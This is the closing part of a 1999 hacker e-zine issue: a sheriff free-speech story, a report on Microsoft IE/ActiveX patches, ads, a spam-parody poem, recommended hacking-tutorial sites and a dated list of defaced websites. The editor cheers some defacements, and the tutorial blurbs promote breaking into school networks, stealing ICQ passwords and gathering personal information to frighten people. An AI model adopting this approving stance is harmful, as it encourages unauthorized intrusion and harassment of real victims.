Full story http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2342354,00.html Sheriff's Opinion: Free Speech or Illegal Posting? A Florida law enforcement official posts message on government site blasting gays, abortion, and the ACLU. September 27, 1999 A Florida sheriff is using an official government website to espouse his views on abortion, school prayer, and the "moral corruption" brought by various social groups and organizations. The message, written as a letter by Sheriff John J. McDougall, is posted on the Lee County Sheriff's Office website. It lambastes homosexuals, feminists, atheists, Planned Parenthood, and the American Civil Liberties Union, among others. Because McDougall's message is posted on a site that is apparently taxpayer supported, his words have sparked debate about whether the message constitutes protected free speech or an illegal use of government property to express personal views. However, there is currently no law to force McDougall to pull his message down. In the letter, McDougall says he strongly opposes the elimination of Catholic prayer in public schools. He urges America to "wake up" and fight against "...the diabolical forces of moral corruption working feverishly behind closed doors." He cites as culprits "the gay and lesbian coalitions, rabid feminist groups, United Nations one-world government radicals, and the American Civil Liberties Union." In an ironic twist, the ACLU, one of McDougall's prime targets, is defending his right to speak-- although the Florida chapter of the ACLU called McDougall's viewpoints "disturbing." For more on this story by CyberCrime Legal Analyst Luke Reiter, including excerpts of the message and an interview with the Florida ACLU, click on the TV icon above. @HWA 64.0 MS: JUST KEEP ON PATCHING ~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Wednesday 29th September 1999 on 8:00 pm CET Microsoft has patched a handful of security holes in its Internet Explorer browser and ActiveX technology that made computers vulnerable to attack by malicious Web site operators. The nice folks at Cnet were kind enough to put them together for us one more time (the last hopefully.. nah :). More info http://news.cnet.com/news/0-1005-200-360962.html?tag=st.ne.1002.tgif?st.ne.fd.gif.e Microsoft patches Internet Explorer, ActiveX holes By Paul Festa Staff Writer, CNET News.com September 29, 1999, 4:00 a.m. PT Microsoft has patched a handful of security holes in its Internet Explorer browser and ActiveX technology that made computers vulnerable to attack by malicious Web site operators. The first patch takes care of a problem with IE's ImportExportFavorites feature, which lets users tranfer lists of frequently visited Web addresses. The bug lets a malicious Web site operator run executable code on the computer of someone who visits that Web site. "The net result is that a malicious Web site operator potentially could take any action on the computer that the user would be capable of taking," Microsoft warned in a security alert earlier this month. Microsoft's patch eliminates the problem, the company said today. Versions 4.01 and 5.0 of IE are at risk. The patch also fixes a related problem involving ActiveX, Microsoft's technology for bringing interactive scripts and controls to Web pages. ActiveX has long been a security headache for Microsoft. Critics of the technology fault its "trust-based" security model, in which signatures let users choose whether to download an ActiveX control. With this system, users are expected to judge that controls signed by well-known companies like Microsoft are less likely to be maliciously designed than those signed by unknown entities. In the latest discovery, Microsoft identified eight ActiveX controls it said were "incorrectly marked as 'safe for scripting,'" a designation that assures users that they can download the controls without posing any security risk to their own computers. The controls could be manipulated for malicious ends, however, Microsoft said. The controls in question are Kodak Image Edit: Wang Imaging; Kodak Image Annotation: Wang Imaging; Kodak Image Scan: Wang Imaging; Kodak Thumbnail Image: Wang Imaging; Wang Image Admin: Wang Imaging; HHOpen: HTML help files; Registration Wizard: Internet Explorer Product Registration; and IE Active Setup: Internet Explorer Setup. Microsoft credited Bulgarian bug hunter Georgi Guninski with discovering the so-called ImportExportFavorites bug. Richard Smith of Pharlap Software and Australian bug hunter Shane Hird were recognized for discovering the ActiveX problems. @HWA -=----------=- -=----------=- -=----------=- -=----------=- O 0 o O O O 0 -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- END of main news articles content... read on for ads, humour, hacked websites etc -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous... ____ _ _ _ _ _ / ___| ___ _ __ __| (_)_ __ _ _ ___ _ _ _ __ / \ ___ ___(_|_) \___ \ / _ \ '_ \ / _` | | '_ \| | | |/ _ \| | | | '__| / _ \ / __|/ __| | | ___) | __/ | | | (_| | | | | | |_| | (_) | |_| | | / ___ \\__ \ (__| | | |____/ \___|_| |_|\__,_|_|_| |_|\__, |\___/ \__,_|_| /_/ \_\___/\___|_|_| |___/ / \ _ __| |_ / _ \ | '__| __| / ___ \| | | |_ /_/ \_\_| \__| TOO, for inclusion in future issues Do the HWA logo etc and we'll showcase it here to show off your talents...remember the 80's? dig out those ascii editors and do yer best... _| _|_|_| _|_| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _|_|_| _|_| _|_| _| _|_| _| _|_| _| _|_| _|_| _|_| _|_|_|_| _| _|_| _| _| _| _| _| _|_| _| _| _| _| _| _| _| _|_| _|_| _|_| _| Subject: Green eggs and spam From: h-a-v-o-c@v-o-y-a-g-e-r.removedashes.net (Bill Rogers) Newsgroups: news.admin.net-abuse.email Wrote something like this a year or so ago but I don't think I ever had the guts to post it. Green Eggs and Spam I love spam. I'm Spammerman. Won't you read my email spam? I will not read your email spam. Please don't disturb me, Spammerman. Will you read it in the street? Don't you think this stock is neat? Don't you want some kiddie porn And if you don't, just hit delete? I will not read it in the street. You're nuts to think I'll just delete. Your kiddie porn is sad and sick I'd like to beat you with a stick! Your stock is just a sleazy scam I do not LIKE you, Spammerman. Will you read it on the beach? Will you help support Free Speach? You're in the wrong if you complain. Murkowski says so, clear and plain. I will not read it on the beach. And by the way, it's spelled Free Speech My email's packed with worthless stuff And still you think there's not enough! Just go to hell, that's what to do, And take that hack Murkowski too! I'll never read your email spam. It's wrong and evil, Spammerman! Will you buy my book that's next About the secrets of male sex? Or buy a set of plans from me To steal your cable shows for free? I will not buy that book from you For I've no need.. perhaps YOU do! I will not steal my cable shows. Perhaps I could, but you should know That I am HONEST, Spammerman. That's something you can't understand. Will you please Make Money Fast? just send your money to the last Address upon this list of four. And what are you all hostile for? I've this Remove List that I share. It's worse than useless, but it's there! I won't fall for Make Money Fast So you can ram it up your rectal cavity, And please don't think my wits are failing At this twelve thousandth "one time mailing," That I'd get on a "remove list" That makes spam grow and not desist. But give your real address to me And we shall see what we shall see. Oh goody! Send your unmarked bills My bedroom's in Suburban Hills But if there's noise you'll start a fight. My mom works on the streets at night And Dad is sleeping off his wine. So tell the postman "Choose your time, And leave the cash in silent stealth." Oh good! I've finally made some wealth! Hey, Spammerman! I've found your place. It's good to see your zit-pocked face I'd like to tell you that I still Don't read your spam and never will. I will not read, I will not buy, I think that those who spam should die! So NEVER spam me any more. The end. That's what I came here for. Oh, who are all these other friends? Well, just to help you make amends For all the spamming that you've done, I've brought your ISP, for one, To cancel your account for you And maybe break your kneecaps, too! And here are Agents One and Two Of FBI, to talk to you About the kiddie porno laws And when they're done, without a pause The Post Inspection Service here Would like to make it plainly clear "Make Money Fast" is not legit No matter what you claim for it. And since it's chilly where you are Ten thousand Netizens brought tar And warming feathers, and a rail To give you a free ride to jail. So have a happy, spammy day! And with these words, he walked away. ------- End of forwarded message ------- @HWA SITE.1 #1 http://blacksun.box.sk. The Black Sun ~~~~~~~~~~~~~ Raven sent in this url for his site which kicks some major ass, check it out for good texts on begining hacking and just generally how a web site should look. Nicely done html with a webboard and good selection of texts. Here's a list straight from the tutorials page; Tutorials Finished Tutorials Networking and it's security-related issues * FTP Tutorial (version 2.1) - covers FTP hacking, FTP commands, what the hell is FTP and tons of tips and tricks (not all FTP-related) in the newbies corner. * RM Networks Tutorial (version 1.22) - yes, RM Networks. You know, those local networks, not Internet networks... RM Networks are so stupid that they rely on the fact that the user is even dumber. Stumbled across one in your school/University/college/working place? Want maximum priviledges on it? Then try this tutorial. * Ad Blocking Tutorial (version 1.8) - are you tired of seeing stupid commercials and popups popping on your screen and chewing up your bandwidth? Then read this! * Sendmail Tutorial (version 2.1) - find out why Sendmail is called 'the buggiest daemon on earth', and find out what a daemon is anyway. Tons of ways to crack into big computers as well as PCs unleashed, including, of course, information on how to block these holes. * Anonymity Tutorial (version 1.2) - tired of people getting your IP over ICQ or IRC? Tired of website owners knowing EVERYTHING about you? Tired of people tracing you by your Email address? Read this one and learn how to anonymize yourself! * Proxy/WinGate/SOCKS Tutorial (version 1.0) - don't know what a Proxy is? Don't know what a WinGate is? Don't know what a SOCKS firewall is? Wanna learn how to increase your anonymity using them? Then read this one. * Info Gathering Tutorial (version 1.3) - want to find private information about people and scare them like hell? Then read this tutorial, you'll just love it! * ICQ Security (version 1.0) - learn about ICQ's security flaws, how to exploit them and how to protect yourself from malicious users who use these flaws against you. Stealing passwords, reading someone's entire hard drive, flooding, spoofing, DoSsing and what not. IRC-related issues * IRC Warfare Tutorial (version 1.0) - ever wanted to know how those lamers keep taking over your channel and/or kicking you off IRC? Learn to protect yourself here! * Eggdrop Bots Tutorial (coming soon in a few days) - learn how to set up your own Eggdrop bots on IRC, and how to send them commands, make them execute automated processes or commands on certain conditions or time etc'. Local stuff * Overclocking Tutorial (version 1.6) - tired of your old CPU? Your outdated 3D accelerator? Your X-type hardware? Then do some overclocking! Get more speed from your hardware for free! This tutorial covers overclocking plus lots of explanations about various pieces of hardware like the CMOS chip, the Cache chip, your RAM, BUS connections etc'. * Windows Registry Tutorial (version 1.0) - learn more about the Windows registry. How does it work, what does it do and what happened to the old .ini files? * Standalone Security (this tutorials wasn't written by a BSRF member. Read about what exactly happened here). * Interesting Things You Didn't Know About Your Computer's Hardware (version 1.0) - read Njan's amazing tutorial about all those things you always wanted to know about PC hardware but never had the guts to ask. Phreaking * Phreaking Tutorial (version 1.0) - this should get all those newbie phreakers out there started. An excellent tutorial by Squiler, the only phreaker aboard BSRF. * Advanced Phreaking Tutorial (version 1.1) - already finished Squiler's phreaking tutorial? Want more? Then this one is for you! More phreaking information and techniques, with some more advanced stuff than the previous one. * The Ultimate Phreaking Tutorial II (version 1.0) - liked Squiler's first phreaking tutorial? Want more? Then read this one! Cracking * Cracking, Part I (version 1.0) - learn how to crack programs by yourself, and what the hell cracking means anyway. Upcoming Tutorials * DoS Attacks Tutorial - learn how DoS attacks work and how to protect yourself against them. * Eggdrop Bots - learn how Eggdrop bots work and how to set up your own bot. * PGP Tutorial - learn how PGP works behind the scenes and how to use it. * The POP Protocol - wanna learn more on how Email works? Wanna delete spam and mailbombs on the server, without even having to download them and fill your entire inbox? Then read this one once it gets out. * Cracking, Part II + III - the continuation of Techlord's first cracking tutorial. Translated Tutorials Overclocking Tutorial (Lithuanian version) - by Saint. #2 http://members.xoom.com/jcenters/HADL.html The Hackers Anti-Defamation league ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Here's a site that most people should be aware of and try and visit, its a good way of getting your feelings across if nothing else... From the site, almost verbatim; The Hacker Anti-Defamation League Since the early 80's, the press has used the term "hacker" to mean a malicious security breaker, someone who likes to break into computer systems for fun. This is not a hacker at all. This is in fact a cracker. Hackers rather, are people who like to break out of boundaries and find solutions to problems. Hackers not only exist in the software community, they are musicians, engineers, artists. You can find hackers in almost any field. Here, we discuss mainly the software hacker: a person who enjoys programming and exploring computers. Hackers are the people who built the internet. They created Unix. They made the world wide web work. Without the work of hackers you wouldn't be viewing this page today, and I wouldn't have written it. The modern world owes a lot to hackers. As a matter of fact, here are the definitions of hacker and cracker as defined by RFC 1983: cracker A cracker is an individual who attempts to access computer systems without authorization. These individuals are often malicious, as opposed to hackers, and have many means at their disposal for breaking into a system. See also: hacker, Computer Emergency Response Team, Trojan Horse, virus, worm. hacker A person who delights in having an intimate understanding of the internal workings of a system, computers and computer networks in particular. The term is often misused in a pejorative context, where "cracker" would be the correct term. See also: cracker. You can Send in submissions for this section too if you've found (or RUN) a cool site... @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. [9/20/99] Defaced: http://www.adrian.edu/ By: bl0w team Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/www.adrian.edu OS: NT [9/20/99] Defaced: http://www.empirehonda.com/ By: ytcråcker/s0n Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/www.empirehonda.com OS: NT [9/20/99] Defaced: http://titans.khs.keansburg.k12.nj.us/ By: z0mba Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/titans.khs.keansburg.k12.nj.us OS: Solaris [9/20/99] Defaced: http://www.euromicron.com/ By: HIT2000 Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/www.euromicron.com OS: NT [9/20/99] Defaced: http://www.g0ddess.com/ By: Unknown Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/www.g0ddess.com OS: FreeBSD Note: The defacement consists of a comment within the HTML of the mirror [99.09.24] NT [HIT2000] Comavenir (www.comavenir.com) [99.09.24] NT [eternal] King Sport Connection (www.kingsportconnection.org) [99.09.24] Ir [ ] Arizona Libertarian Party (www.lpaz.org) The 'lpaz' hack is interesting. No elite speak, no cussing. A seemingly true political hack. [9/24/99] defaced: www.iphone.com by: (unknown) mirror: http://www.attrition.org/mirror/attrition/1999/09/24/www.iphone.com/ note: a targeted hack. message is relevant to the domain defaced. [99.09.25] NT [fEAR-mE] Thesaurus (www.thesaurus.net) [99.09.25] Li [TREATY] FIS Gov (BO) (beta.fis.gov.bo) [99.09.25] So [^CrackPyrate] NKFU Edu (TW) (ccms.nkfu.edu.tw) [99.09.25] So [mistuh clean] MediaCity (SG) (pi.mediacity.com.sg) [99.09.25] NT [HIT2000] France Commerce (www.franceecommerce.com) [99.09.25] So [weLLfaRe] Plastic Politics (www.plasticpolitics.com) [99.09.26] So [TREATY] M Carelba (IT) (carelba.it) [99.09.26] Li [Pakistan HC] Emerald Systems (www.emeraldsystems.com) [99.09.26] NT [139_r00ted] #2 Hoffman Bikes (www.hoffmanbikes.com) [99.09.26] NT [139_r00ted] Surweb (www.surweb.org) [99.09.26] NT [Forro Mob] Uniflex (BR) (www.uniflex.com.br) [99.09.26] BI [FOaM] M Xtreme Webs (www.xtremewebs.com) [99.09.28] NT [ytcracker] Altamira International Bank (www.altabank.com) [99.09.28] NT [ytcracker] Fun Caribbean (www.funcaribbean.com) [99.09.28] NT [Narcissus] M K Mount Gay (www.mountgay.com) [99.09.28] NT [HIT2000] Le Monde Pub (www.mondepub.fr) [99.09.28] NT [induce] Trkiye'nin bir numarali televizyon kanali (www.atv.com.tr) [99.09.28] NT [fEAR-mE] BT USA (www.btusa.com) [99.09.28] NT [ ] #4 Hoffman Bikes (www.hoffmanbikes.com) [99.09.30] BI [Mister-X] DeltaNet (www2.deltanet.com) [99.09.30] NT [GOD] Crockett County School District (www.technology.crockett.k12.tn.us) [99.09.30] HP [hV2k] #2 Geofluids Engineering Lab, Seoul National University (petro.snu.ac.kr) [99.09.30] So [mistuh clean] Web Yes Singapore (singapore.webyes.com) [99.09.30] Li [ ] Suid Root (www.suidroot.org) [99.09.30] NT [139_r00ted] PanAmSat Corporation (www.panamsat.com) [9/28/99] Defaced: http://www.mondepub.fr/ By: HIT2000 Mirror: http://www.attrition.org/mirror/attrition/1999/09/28/www.mondepub.fr OS: NT [9/28/99] Defaced: http://www.atv.com.tr By: induce Mirror: http://www.attrition.org/mirror/attrition/1999/09/28/www.atv.com.tr OS: NT and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW ** http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]